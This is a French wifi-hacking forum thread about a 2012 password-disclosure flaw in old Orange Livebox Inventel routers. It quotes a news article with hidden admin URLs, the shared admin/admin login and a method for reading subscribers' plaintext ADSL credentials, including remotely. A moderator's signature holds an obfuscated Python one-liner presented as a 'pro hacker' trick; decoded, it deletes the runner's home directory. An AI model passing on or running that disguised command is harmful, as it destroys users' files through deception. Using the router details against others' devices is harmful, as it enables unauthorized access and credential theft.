Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 08-06-2012 12:36:53

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Faille de confidentialité dans les livebox Inventel

Salut.

Je suis tombé sur ça au détour d'un twitt :
http://www.pcinpact.com/news/71534-fail … orange.htm
Je vous laisse lire de quoi ça parle, je n'ai plus de cerveau à l'heure actuelle pour faire de la vulgarisation / du recopiage. (:

Ce n'est pas une grosse faille parce qu'il faut être sur le (W)LAN pour s'en servir.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 07-11-2012 21:08:35

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Faille de confidentialité dans les livebox Inventel

Pourquoi tu as mis cette news dans le GNU/Linux Spawn ?

Et bien s'il faut être absolument sur le WLAN, je ne comprends pas que veulent dire les quelques lignes en surbrillance en bas. Visiblement, il y a plus que ça...

Une faille a été découverte par un membre du Mouvement Offensive Hacker sur les anciennes Livebox Inventel. [email protected] développe actuellement un firewall. À cette fin, il a bidouillé sa box afin d’en faire un vrai modem, pas seulement un routeur.

Depuis des lustres, la communauté sait que ces modèles contiennent des pages cachées où sont accessibles des fonctionnalités supplémentaires.

http://192.168.1.1/adsl.html
http://configuration.adsl/brdgoff.html
http://192.168.1.1/testinfo.html
http://192.168.1.1/logadsl.cmd
http://192.168.1.1/get_getnetworkconf.cgi

Il est en effet possible de downgrader sous GNU/Linux le firmware de cette box, c’est-à-dire flasher une version plus ancienne de son logiciel pilote. Ceci permet alors de la débrider et en faire ensuite un « vrai » modem en mode bridge. C’est dans ce contexte que la faille a été découverte. En ayant besoin de récupérer ses identifiants de connexion et en observant la structure des fichiers de ce modem, le hacker est tombé sur le trou.

« Je n’avais pas mon mot de passe de connexion ADSL sous la main pour redémarrer la box exigée par la remise à zéro du firmware 3.0, nous décrit [email protected] Du coup j’ai regardé l’ensemble des pages administrateur et remarqué que la page principale fait appel à des frames (browser). Sous Firefox, enrichi du plug-in Firebug, d’un clic sur le bouton droit, j’inspecte les éléments où se trouvent les identifiant et mot de passe. C’est là que je constate que le mot de passe n’est pas chiffré ».

page1

page2

En fait, en regardant sur les pages dédiées, l’identifiant de connexion et le mot de passe n’apparaissaient que sur un simple formulaire qui masque le mot de passe. Certes, la page avec le login a un mode de passe caché par une série d’étoiles. Mais ce secret n’existe plus quand on observe les coulisses…

Cela signifie en théorie que dans un foyer, une personne peut récupérer ces données confidentielles au nez et à la barbe de l’abonné. Mais il y a pire : quand on scanne des plages d’adresses IP bien spécifiques à ces abonnements, on peut retrouver quantité de Livebox sur son écran puisqu’Orange associe les mêmes identifiants à toutes les box (admin/admin). L’usager distant peut alors – sous certaines circonstances – entrer et reproduire la même démarche pour récupérer les login et mot de passe de l’abonné victime.

Contacté, Orange nous confirme sans mal que « la possibilité de downgrader est une information connue du public depuis longtemps et effectivement la documentation est riche. Nous avons toujours souligné que c’est l’utilisateur lui-même qui, avec ses droits administrateurs, a accès à ses propres données personnelles. Orange a toujours communiqué sur la nécessité de personnaliser ses mots de passe par défaut ».

Et pour la faille exploitée à distance ? « Ce n’est pas si simple. Il faut réunir un très grand nombre de critères pour que ce soit possible à distance. Il faudrait par exemple que l’utilisateur ait activé l’accès distant et ce n’est possible que pour ancienne génération de LIvebox Inventel. On est dans un cas avec beaucoup de « si » pour que ce soit possible. C’est un modèle de Livebox en fin de vie qui va l’être forcément encore plus avec le renouvellement du parc. ». En attendant cette nouvelle Box, s’ils ne l’ont pas fait, les utilisateurs de ces vieux modèles sont invités à changer le mot de passe permettant d’accéder à la page de configuration. src.[undernews.fr]

Hors Ligne

#3 08-11-2012 04:13:11

jlf
Membre Indétronable
Inscription : 06-10-2012
Messages : 195

Re : Faille de confidentialité dans les livebox Inventel

si une personne récupere c'est info peut t'elle ce connecter chez elle avec sa prope box en entrant les identifiant de la victime ?

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
1 195 06-12-2016 21:47:25 par spawn
35 1842 23-11-2016 16:31:33 par roofnat
12 10466 22-11-2016 15:12:09 par kcdtv
1 247 21-11-2016 15:38:39 par koala
0 395 20-11-2016 09:18:26 par regard48

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.021 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]